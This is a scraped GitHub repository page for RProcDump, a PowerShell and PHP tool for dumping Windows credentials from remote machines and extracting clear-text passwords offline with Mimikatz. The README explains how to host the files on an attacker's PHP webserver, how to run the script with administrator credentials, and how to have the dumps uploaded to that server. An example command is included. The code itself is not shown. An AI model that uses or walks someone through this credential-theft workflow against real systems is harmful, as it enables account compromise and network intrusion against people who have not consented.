Skip to content
Remote process dumping automation. Use it to dump Windows credentials remotely and extract clear text with Mimikatz offline
PowerShell PHP
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitattributes
README.md
RProcDump.ps1
proc32.txt
proc64.txt
procdump.ps1
psx32.txt
psx64.txt All files created Dec 23, 2019
upload.php

README.md

RProcDump

Remote Windows credentials dump process automation. Can be used to dump Windows credentials remotely and later extract clear text with Mimikatz offline.

Help: Host all files in a webserver able to interpret PHP (apache2 on kali linux) Edit prameters in procdump.ps1 and run Rprocdump.ps1 with same parameters on attack machine: example:

#> RProcdump -server http://127.0.0.1 -login administrator -pass password123

Need local admin privileges !!!

Author: @ThebenyGreen

  • EyesOpenSecurity

Credits: Mark Russinovich Sysinternals- psexec.exe and Procdump.exe

You can’t perform that action at this time.